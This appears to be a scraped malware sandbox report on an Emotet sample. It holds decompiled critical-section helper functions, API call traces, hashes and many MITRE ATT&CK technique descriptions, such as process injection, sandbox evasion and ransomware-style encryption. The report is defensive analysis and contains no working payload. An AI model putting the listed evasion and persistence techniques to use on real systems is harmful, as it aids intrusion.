Function 00425F56, Relevance: 5.0, APIs: 4, Instructions: 36
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00425F56(signed int _a4) {
				void* _t14;
				struct _CRITICAL_SECTION* _t16;
				signed int _t22;
				intOrPtr* _t25;
				intOrPtr _t30;
				intOrPtr _t31;

				_t30 =  *0x439bdc; // 0x1
				if(_t30 == 0) {
					_t14 = E00425EC3();
				}
				_t31 =  *0x439bd8; // 0x0
				if(_t31 == 0) {
					_t22 = _a4;
					_t25 = 0x4399e0 + _t22 * 4;
					if( *((intOrPtr*)(0x4399e0 + _t22 * 4)) == 0) {
						EnterCriticalSection(0x439a28);
						if( *_t25 == 0) {
							InitializeCriticalSection(0x439a40 + (_t22 + _t22 * 2) * 8);
							 *_t25 =  *_t25 + 1;
						}
						LeaveCriticalSection(0x439a28);
					}
					_t16 = 0x439a40 + (_t22 + _t22 * 2) * 8;
					EnterCriticalSection(_t16);
					return _t16;
				}
				return _t14;
			}

APIs

EnterCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425F91
InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FA3
LeaveCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FAC
EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700), ref: 00425FBE

Part of subcall function 00425EC3: GetVersion.KERNEL32(?,00425F66,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700,0041843C), ref: 00425ED6

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: CriticalSection$Enter$InitializeLeaveVersion
String ID:
API String ID: 1193629340-0
Opcode ID: 8ad6497125d2c86d00cbfb5de7a409f9b0d7499c984595d8118e55b052ad55c4
Instruction ID: b3ac33658b3b741abd4bb59a3792cd3dace0394c803b1a2d8ae3ffca9e92013f
Opcode Fuzzy Hash: 8ad6497125d2c86d00cbfb5de7a409f9b0d7499c984595d8118e55b052ad55c4
Instruction Fuzzy Hash: 00F0497160472ADFCB20EF64FC84997B3ACFB18316B81203BE64582161D774B956DBAC

Uniqueness

Uniqueness Score: -1.00%

Function 004079AB, Relevance: 5.0, APIs: 4, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004079AB(void* __eax) {
				void* _t1;

				_t1 = __eax;
				InitializeCriticalSection( *0x436f2c);
				InitializeCriticalSection( *0x436f1c);
				InitializeCriticalSection( *0x436f0c);
				InitializeCriticalSection( *0x436eec);
				return _t1;
			}

0x004079ab
0x004079b8
0x004079c0
0x004079c8
0x004079d0
0x004079d3

APIs

InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079B8
InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079C0
InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079C8
InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079D0

Memory Dump Source

Source File: 00000001.00000002.493993336.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.493968359.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494135065.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.494185133.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494209574.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.494226463.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_iasrecst.jbxd

Similarity

API ID: CriticalInitializeSection
String ID:
API String ID: 32694325-0
Opcode ID: 51e235add1c7942b8d8dfe3c36194d8a20d458bafa86fc8f5d4db9dc8472a5e3
Instruction ID: 7b146446db7a68f273d69e9c37099d6d57513ee84f4d93e1aa445e082747f6c1
Opcode Fuzzy Hash: 51e235add1c7942b8d8dfe3c36194d8a20d458bafa86fc8f5d4db9dc8472a5e3
Instruction Fuzzy Hash: 67C00235905135FADF516B75FC058493F25EB063A0312E172E5145103487631C15EFD8

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 2ojdmC51As.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Function 004013A4, Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 288
libraryloaderCOMMON

Function 021E38F0, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 189
fileCOMMON

Function 021E5070, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 205
serviceCOMMON

Function 00425FF1, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Function 021E8240, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 183
fileCOMMONCrypto

Function 021E42F0, Relevance: 1.5, APIs: 1, Instructions: 30
memoryCOMMON

Function 00409C36, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre